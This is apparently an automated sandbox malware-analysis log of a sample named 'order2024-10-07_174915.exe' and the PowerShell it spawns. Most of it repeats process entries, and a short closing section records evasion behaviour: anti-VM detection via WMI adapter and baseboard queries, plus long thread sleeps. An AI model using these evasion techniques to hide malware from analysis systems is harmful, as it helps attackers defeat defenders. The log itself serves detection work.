                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: order2024-10-07_174915.exe PID: 1448, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 1650000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 32E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 52E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 8130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 9130000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 92E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: A2E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 2C60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeMemory allocated: 4E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7256Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2464Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWindow / User API: threadDelayed 1375Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWindow / User API: threadDelayed 2895Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7292Thread sleep count: 1375 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7292Thread sleep count: 2895 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99414s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99174s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -99047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98936s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98821s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -98015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -97906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
